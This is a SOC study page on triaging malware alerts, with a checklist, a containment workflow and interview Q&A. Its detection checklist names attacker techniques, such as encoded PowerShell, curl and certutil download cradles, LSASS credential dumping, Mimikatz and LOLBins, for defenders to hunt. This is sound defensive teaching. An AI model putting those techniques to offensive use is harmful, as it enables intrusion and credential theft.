Skip to content

🦠 Malware Infection Alert

A malware detection is one of the most common and critical alerts in any SOC. It could be a blocked file, an active infection, or a living-off-the-land attack that bypasses traditional AV.

What triggers a malware alert?

Malware alerts originate from EDR tools (CrowdStrike, SentinelOne, Defender for Endpoint), antivirus engines, email sandboxes, or SIEM rules correlating suspicious process behavior. The alert might mean the malware was blocked, quarantined, or is actively running — you must establish which one first.

What to Check (SOC L1 Checklist)

Priority Field What You Are Looking For
🔴 First Alert action Was the file Blocked, Quarantined, or Allowed? If Allowed, treat as active.
🔴 First Affected hostname & user Who and what is impacted? Domain-joined? Admin account?
🟡 Second File name & full path Unusual paths: %TEMP%, AppData\Roaming, ProgramData are red flags
🟡 Second File hash (SHA-256) Submit to VirusTotal, MalwareBazaar, Hybrid Analysis immediately
🟡 Second Parent process What spawned the malicious file? Word.exe → PowerShell = macro attack
🟠 Third Command-line arguments Look for encoded PowerShell, curl, certutil, or download cradles
🟠 Third Network connections Did the process phone home? What IPs/domains did it contact?
🟠 Third Persistence mechanisms Registry Run keys, scheduled tasks, services, startup folder entries
🟢 Fourth Lateral movement indicators SMB connections to other hosts, pass-the-hash, credential dumping

Investigation Workflow

Phase 1 — Immediate Triage (First 5 minutes)

  1. Check the EDR alert: was the file blocked/quarantined or allowed to execute?
  2. Look up the file hash on VirusTotal — community score, detection names, first seen date
  3. Check the process tree in the EDR — what parent process spawned the malware?
  4. Determine if the action is still in progress or already stopped
  5. Assess scope: one host or multiple?

Phase 2 — Deep Investigation (Next 15–30 minutes)

  • Process analysis: Review command lines, loaded DLLs, memory injections
  • Network analysis: Review all outbound connections — C2 callbacks, DNS lookups, beaconing patterns
  • File system: Check what files were created, modified, or deleted around the event time
  • Persistence: Check Registry Run keys, scheduled tasks, WMI subscriptions, services
  • Credential access: Check for LSASS access (credential dumping), SAM access, or Mimikatz artifacts
  • Lateral movement: Check for SMB or RPC connections from the infected host to other internal IPs

Phase 3 — Containment

When to isolate

If the hash has a high VirusTotal score, the file executed, or there are C2 callback signs — isolate the host immediately via EDR. Do not power it off; you preserve volatile memory and active logs.

  • Isolate the endpoint via EDR network isolation (CrowdStrike: Contain Host)
  • Block the hash globally (EDR custom IOC rule)
  • Block C2 IPs/domains at the firewall and proxy
  • Disable the compromised account if credential theft is suspected
  • Check all other endpoints for the same hash or process

Interview Questions & Answers

Q1. How do you handle a malware alert in the SOC?

"I start by checking whether the EDR blocked or allowed the file. If it was blocked, I still investigate to confirm there are no remnants. If it ran, I treat it as an active incident. I look up the file hash on VirusTotal, analyze the process tree in the EDR to see what spawned it, and check for network callbacks to a C2 server. If it's active and confirmed malicious, I isolate the host via EDR, block the IOCs globally, and escalate to L2 with my full findings."

Q2. What is a file hash and why do you check it on VirusTotal?

"A file hash is a fixed-length fingerprint — usually SHA-256 — generated from the file's contents. If even one byte changes, the hash changes completely. I submit it to VirusTotal because their platform aggregates the detection results from 70+ antivirus engines. A high detection score and known malware family name gives me confidence the file is malicious, even before I analyze it dynamically."

Q3. What is a process tree and why is it important?

"A process tree shows the parent-child relationships of running processes. In malware analysis it reveals the attack chain. For example, if winword.exe spawned powershell.exe which spawned cmd.exe, that tells me a malicious macro in a Word document executed a PowerShell download cradle. The process tree tells you the initial access vector and the full execution chain."

Q4. What does 'living off the land' mean?

"Living off the land (LotL) means the attacker uses legitimate, pre-installed system tools — like PowerShell, WMI, certutil, mshta, or regsvr32 — to carry out malicious actions. Because these are trusted binaries, signature-based AV often misses them. EDR behavioral detection is needed to catch these. Common LotL binaries are called 'LOLBins' — Living Off the Land Binaries."

Q5. When do you isolate a host, and when do you not?

"I isolate when the malware has executes and is confirmed malicious — especially if there are C2 callback signs, lateral movement, or credential dumping activity. I isolate via EDR network isolation rather than physically unplugging the machine or powering it off, because powering off destroys volatile memory and running processes. However, if the file was quarantined before it ran and there are no execution indicators, full isolation may not be necessary."

Q6. What is a C2 (Command and Control) server?

"A C2 or command-and-control server is infrastructure the attacker controls that the malware on a victim's machine connects to for instructions and data exfiltration. The malware 'beacons' back to the C2 at regular intervals. I check for C2 communication by looking at outbound DNS requests, HTTP/HTTPS connections to external IPs, and patterns like regular-interval beaconing in network logs."

Q7. How do you check if malware has spread to other machines?

"I search the SIEM and EDR for the same file hash, IP address, or domain name across all endpoints in the environment. I also check for lateral movement indicators on the originally infected host — SMB connections to other internal IPs, pass-the-hash attempts, or RDP sessions initiated from it. If the malware is a worm or has a lateral movement component, isolating one host without scope assessment leaves the rest exposed."

Q8. What persistence mechanisms do malware typically use?

"Common persistence mechanisms include: Registry Run keys that execute on login, scheduled tasks, Windows services installed by the malware, WMI subscriptions that trigger on events, startup folder entries, and DLL hijacking. I check all of these during investigation, and eradication must address every persistence mechanism — missing one means the malware comes back after the first reboot."

Q9. What is the difference between a virus, worm, and trojan?

"A virus attaches to an existing file and only spreads when a user executes that infected file. A worm is self-replicating — it spreads automatically across networks without user interaction, exploiting vulnerabilities like WannaCry did with SMB. A trojan disguises itself as legitimate software to trick users into installing it, then carries out a hidden malicious function. The key difference is their propagation mechanism."

Q10. How do you determine if an alert is a false positive?

"I look for evidence that the behavior was expected. For example, a security tool scanning the filesystem, an admin running a script with elevated privileges, or a development machine compiling code might trigger behavioral rules. I check the asset and user context, the alert history for that host, and whether the activity matches a known and approved pattern. If I can explain every artifact without a malicious alternative, it's likely a false positive — but I still document my reasoning."

Q11. What tools do you use to analyze a suspicious file?

"I use VirusTotal for static hash and reputation analysis, Any.run or Hybrid Analysis for dynamic sandbox detonation where I can watch the file execute in a safe environment, and PEStudio or Detect-It-Easy for static PE analysis of Windows executables. For deeper analysis I might use IDA Pro or Ghidra to disassemble the binary, though that's typically L3 reverse engineering work."

Q12. What is ransomware's relationship to malware?

"Ransomware is a category of malware. All ransomware is malware, but not all malware is ransomware. Ransomware specifically encrypts files or systems and demands payment for the decryption key. Modern ransomware attacks often involve a multi-stage infection — an initial dropper or RAT compromises the system first, performs reconnaissance, steals credentials and data, and then deploys the ransomware across the network in a final destructive stage."

Very Short Version (Easy to Remember)

  • Check the action first — Blocked vs. Allowed changes everything
  • Hash on VirusTotal — is it known malicious?
  • Process tree — what spawned it? (Word → PowerShell = macro attack)
  • Network callbacks — is it phoning home to a C2?
  • If active: isolate via EDR (not power off), block IOCs globally
  • Escalate with: hash, parent process, C2 IPs, scope, timeline